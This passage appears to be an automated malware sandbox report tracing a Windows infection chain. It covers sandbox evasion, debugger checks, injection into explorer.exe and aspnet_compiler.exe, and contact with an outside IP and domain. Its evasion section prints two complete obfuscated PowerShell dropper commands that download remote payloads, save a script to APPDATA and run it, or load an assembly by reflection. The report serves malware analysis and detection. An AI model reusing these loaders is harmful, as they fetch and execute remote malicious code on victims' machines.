          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 600000
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 600000
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Users\user\AppData\Roaming\vtjrhjiThread delayed: delay time: 922337203685477
          Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
          Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1422Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5891Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2298Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5090Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1782Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 467Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1583
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4453
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 597
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1982
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2368
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 541
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 927
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1420
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2499
          Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 533
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\03wlztsz\03wlztsz.dllJump to dropped file
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\mffkkngw\mffkkngw.dllJump to dropped file
          Source: C:\Windows\System32\mshta.exe TID: 3564Thread sleep time: -360000s >= -30000sJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3756Thread sleep time: -240000s >= -30000sJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3856Thread sleep time: -2767011611056431s >= -30000sJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3788Thread sleep count: 2298 > 30Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3788Thread sleep count: 5090 > 30Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3832Thread sleep time: -120000s >= -30000sJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3836Thread sleep time: -922337203685477s >= -30000sJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3776Thread sleep time: -922337203685477s >= -30000sJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 804Thread sleep time: -60000s >= -30000sJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 772Thread sleep count: 1583 > 30
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1972Thread sleep count: 4453 > 30
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1472Thread sleep time: -60000s >= -30000s
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3012Thread sleep time: -5534023222112862s >= -30000s
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3012Thread sleep time: -2400000s >= -30000s
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3012Thread sleep time: -600000s >= -30000s
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2164Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1884Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\System32\mshta.exe TID: 2032Thread sleep time: -120000s >= -30000s
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1288Thread sleep count: 597 > 30
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1288Thread sleep count: 1982 > 30
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3392Thread sleep time: -180000s >= -30000s
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3160Thread sleep time: -1844674407370954s >= -30000s
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2988Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3384Thread sleep count: 2368 > 30
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3384Thread sleep count: 541 > 30
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2652Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2604Thread sleep time: -60000s >= -30000s
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3284Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3820Thread sleep time: -60000s >= -30000s
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3868Thread sleep count: 1420 > 30
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3860Thread sleep count: 2499 > 30
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 252Thread sleep time: -60000s >= -30000s
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2228Thread sleep time: -8301034833169293s >= -30000s
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2228Thread sleep time: -1200000s >= -30000s
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2228Thread sleep time: -600000s >= -30000s
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3768Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\explorer.exe TID: 2072Thread sleep count: 91 > 30
          Source: C:\Windows\explorer.exe TID: 1120Thread sleep count: 533 > 30
          Source: C:\Windows\explorer.exe TID: 1340Thread sleep time: -180000s >= -30000s
          Source: C:\Windows\explorer.exe TID: 3700Thread sleep count: 290 > 30
          Source: C:\Windows\explorer.exe TID: 3724Thread sleep count: 60 > 30
          Source: C:\Windows\System32\taskeng.exe TID: 3688Thread sleep time: -60000s >= -30000s
          Source: C:\Users\user\AppData\Roaming\vtjrhji TID: 3892Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\explorer.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\explorer.exeLast function: Thread delayed
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\explorer.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 38_2_00121D4A FindFirstFileW,lstrcmpiW,lstrcmpiW,lstrcmpiW,FindNextFileW,FindClose,38_2_00121D4A
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 38_2_00123ED9 PathCombineW,FindFirstFileW,lstrcmpiW,lstrcmpiW,PathCombineW,lstrcmpiW,PathCombineW,FindNextFileW,FindClose,38_2_00123ED9
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 38_2_00122B15 FindFirstFileW,lstrcmpiW,lstrcmpiW,StrStrIW,StrStrIW,FindNextFileW,FindClose,38_2_00122B15
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 40_2_0008255C lstrcatW,PathAppendW,FindFirstFileW,RtlZeroMemory,lstrcatW,PathAppendW,lstrcatW,PathAppendW,StrStrIW,FindNextFileW,FindClose,40_2_0008255C
          Source: C:\Windows\explorer.exeCode function: 42_2_00061EB4 FindFirstFileW,42_2_00061EB4
          Source: C:\Windows\explorer.exeCode function: 42_2_00061DB0 FindFirstFileW,42_2_00061DB0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 38_2_00126512 GetSystemInfo,38_2_00126512
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 600000
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 600000
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 600000
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 600000
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Users\user\AppData\Roaming\vtjrhjiThread delayed: delay time: 922337203685477
          Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
          Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
          Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\
          Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\
          Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\
          Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
          Source: explorer.exe, 0000001F.00000000.521354537.00000000001D6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}7
          Source: explorer.exe, 0000001F.00000000.522082384.0000000003E59000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000
          Source: explorer.exe, 0000001F.00000000.522082384.0000000003DB1000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0
          Source: explorer.exe, 0000001F.00000000.522082384.0000000003E59000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\ide#cdromnecvmwar_vmware_sata_cd01_______________1.00____#6&373888b8&0&1.0.0#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}eeab7790
          Source: explorer.exe, 0000001F.00000000.521769301.00000000025E0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0a
          Source: explorer.exe, 0000001F.00000000.522082384.0000000003E59000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\ide#cdromnecvmwar_vmware_sata_cd01_______________1.00____#6&373888b8&0&1.0.0#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}100\4&20
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSystem information queried: ModuleInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior

          Anti Debugging

          barindex
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSystem information queried: CodeIntegrityInformation
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSystem information queried: CodeIntegrityInformation
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess queried: DebugPort
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess queried: DebugPort
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_000007FE89AA3122 rdtsc 6_2_000007FE89AA3122
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 38_2_00189247 LoadLibraryA,GetProcAddress,VirtualProtect,VirtualProtect,VirtualProtect,38_2_00189247
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 38_2_00121011 GetProcessHeap,HeapFree,38_2_00121011
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
          Source: C:\Users\user\AppData\Roaming\vtjrhjiMemory allocated: page read and write | page guard

          HIPS / PFW / Operating System Protection Evasion

          barindex
          Source: C:\Windows\explorer.exeFile created: vtjrhji.31.drJump to dropped file
          Source: C:\Windows\SysWOW64\explorer.exeNetwork Connect: 46.173.214.24 80
          Source: C:\Windows\SysWOW64\explorer.exeDomain query: prolinice.ga
          Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 2104, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3836, type: MEMORYSTR
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdzZVlpbWFnZVUnKydybCA9IFB1SWh0JysndHBzJysnOicrJy8vMTAxNy5maWxlbWFpbC5jb20vYXBpL2ZpbCcrJ2UvZ2V0P2ZpbGVrZXk9MkFhX2JXbzlSZXU0NXQ3QlUxa1Znc2Q5cFQ5cGdTU2x2U3QnKydHcm5USUNmRmhtVEtqM0xDNlNRdEljT2NfVDM1dyZwa192aWQ9ZmQ0ZjYxNGJiMjA5YzYyYzE3MzA5NDUxNzZhMDkwNGYgUHVJO3NlWXdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XJysnZWJDbGllbnQ7c2VZaW1hZ2VCeXRlcyA9IHNlWXdlYkNsaWVuJysndC5Eb3dubG9hZERhdGEoc2VZaW1hZ2VVcmwpO3NlWWltYWcnKydlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKHNlWWltYWdlQnl0JysnZXMpO3NlWXN0YXJ0RmxhZyA9IFB1STw8QkFTRTY0XycrJ1NUQVJUPj5QdUk7c2VZZW5kRicrJ2xhZyA9IFB1SScrJzw8QkFTRTY0X0VORD4+UHVJO3NlWXN0YXJ0SW5kZXggPSBzZVlpbWFnZVRleHQuSW5kZXhPZignKydzZVlzdGFydEZsYWcpO3NlWWVuZCcrJ0luZGV4ID0gc2VZaW1hZ2VUZXh0LkluZGV4T2Yoc2VZZW5kRmxhZyk7cycrJ2VZc3RhcnRJbmRleCAtZ2UgMCAtYW5kIHNlWWVuZEluZGV4IC1ndCBzZVlzdGFydEluZGV4O3MnKydlWXN0YXJ0SW5kZXggKz0gc2VZc3RhcnRGbGFnLkxlbmd0aDtzZVliYXNlNjRMZW5ndGggPSBzZVllbmRJbmRleCAtIHNlWXN0YXJ0SW5kZXg7c2VZYmFzZTY0Q29tbWFuZCA9JysnIHNlJysnWWltYWcnKydlVCcrJ2V4dC5TdWJzdHJpbmcoc2VZc3RhcnRJbmRleCwnKycgc2VZYmFzZTY0TGVuZ3RoKTtzZVliYXNlNjRSZXZlcnNlZCA9IC1qb2luIChzZVliYXNlNjRDb21tYW5kJysnLlRvQ2hhckFycmF5KCkgMnBPIEZvckUnKydhY2gtT2JqZWN0IHsgc2VZXyB9KVstMS4uLShzZVknKydiYXNlNjRDb21tYW5kLkxlbmd0aCldO3NlWScrJ2NvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uQycrJ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJysnc2VZYmFzZTY0UmV2ZXJzZWQpO3NlWScrJ2xvYWRlZEFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsJysnZWN0aW9uLkFzc2VtYmx5XScrJzo6TG9hZChzZVljb21tYW5kQnl0ZXMpO3NlWXZhaU1ldGhvZCA9IFsnKydkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoUHVJVkFJUHVJKTtzZVl2YWlNZScrJ3Rob2QuSW52bycrJ2tlKHNlWW51bGwsIEAoUHVJdHh0LlRHUkZGUlcvMzUvODcxLjQ0LjI3MS43MDEvLycrJzpwdHRoUHVJLCBQdUlkZXNhdGl2YWRvUHVJLCBQdUlkJysnZXNhdGl2YWRvUHVJLCBQdScrJ0lkZXNhdGl2YWRvUHVJLCBQdUlhc3BuZXRfY29tcGlsJysnZXJQdUksIFB1SWRlc2F0aXZhZG9QdUksICcrJ1B1SWRlc2F0aXZhZG9QdUksUHVJZGVzYXRpdmFkbycrJ1B1SSxQdUlkZXNhdGl2YWRvUHVJLFB1SWRlc2F0aXZhZG9QdUksUHVJZGVzYXRpdmFkb1B1SSxQdUlkZXNhdGl2YWRvUHVJLFB1STFQdUksUHVJZGVzYXRpdmFkb1B1SSkpOycpLnJFUGxhQ0UoJ1B1SScsW1N0ckluR11bQ0hBUl0zOSkuckVQbGFDRSgnMnBPJywnfCcpLnJFUGxhQ0UoJ3NlWScsJyQnKXwgLiAoKGdWICcqTWRyKicpLm5BbUVbMywxMSwyXS1qT0lOJycp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeThread created: C:\Windows\explorer.exe EIP: 2801960
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeThread created: unknown EIP: 2BC1960
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000 value starts with: 4D5A
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000 value starts with: 4D5A
          Source: C:\Windows\explorer.exeMemory written: PID: 3756 base: CA102D value: 90
          Source: C:\Windows\explorer.exeMemory written: PID: 3656 base: FF31B794 value: 90
          Source: C:\Windows\explorer.exeMemory written: PID: 2860 base: CA102D value: 90
          Source: C:\Windows\explorer.exeMemory written: PID: 816 base: CA102D value: 90
          Source: C:\Windows\explorer.exeMemory written: PID: 2068 base: FF31B794 value: 90
          Source: C:\Windows\explorer.exeMemory written: PID: 2912 base: CA102D value: 90
          Source: C:\Windows\explorer.exeMemory written: PID: 2244 base: FF31B794 value: 90
          Source: C:\Windows\explorer.exeMemory written: PID: 2108 base: CA102D value: 90
          Source: C:\Windows\explorer.exeMemory written: PID: 2580 base: FF31B794 value: 90
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and read
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and read
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 401000
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 7EFDE008
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 401000
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 7EFDE008
          Source: C:\Windows\explorer.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: CA102D
          Source: C:\Windows\explorer.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: CA102D
          Source: C:\Windows\explorer.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: CA102D
          Source: C:\Windows\explorer.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: CA102D
          Source: C:\Windows\explorer.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: CA102D
          Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysTEM32\wiNdoWSPoWeRShElL\V1.0\PoWERsHeLl.EXe" "pOWersheLL -Ex BYPaSs -nop -W 1 -c DeVIcECrEdenTiAldePlOYMEnT.exe ; INvokE-EXPressiON($(INvOkE-ExpressiON('[SystEM.tExt.encoDinG]'+[char]0X3A+[char]58+'UTF8.GetsTRIng([SyStEm.cOnVeRT]'+[ChaR]0X3A+[chaR]58+'frombasE64StRIng('+[chaR]34+'JFhvY0VSN21mYWMgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRELXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVNYmVSZEVGaW5pVElvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVcmxNT04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBkbkhyTG8sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgamxXTWh0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEwsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFVEd1JCWENTLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHFFS3ZxKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZHpUayIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFNZVNQQUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbHhzQnRTTVB2ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRYb2NFUjdtZmFjOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA3LjE3Mi40NC4xNzgvNTMvc2VlbXliZXN0bmV0d29ya3doaWNoZ2l2ZWJlc3R0aGluZ3NlbnRpcmVsaWZld2l0aG1lLnRJRiIsIiRFTnY6QVBQREFUQVxzZWVteWJlc3RuZXR3b3Jrd2hpY2hnaXZlYmVzdHRoaW5nc2VudGlyZWxpZmV3aXRoLnZiUyIsMCwwKTtzVEFydC1zbEVFUCgzKTtJRVggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVuVjpBUFBEQVRBXHNlZW15YmVzdG5ldHdvcmt3aGljaGdpdmViZXN0dGhpbmdzZW50aXJlbGlmZXdpdGgudmJTIg=='+[chaR]0X22+'))')))"Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex BYPaSs -nop -W 1 -c DeVIcECrEdenTiAldePlOYMEnT.exeJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\03wlztsz\03wlztsz.cmdline"Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seemybestnetworkwhichgivebestthingsentirelifewith.vbS" Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES2B07.tmp" "c:\Users\user\AppData\Local\Temp\03wlztsz\CSC280AB7AC39534067B2898716E8B346.TMP"Jump to behavior
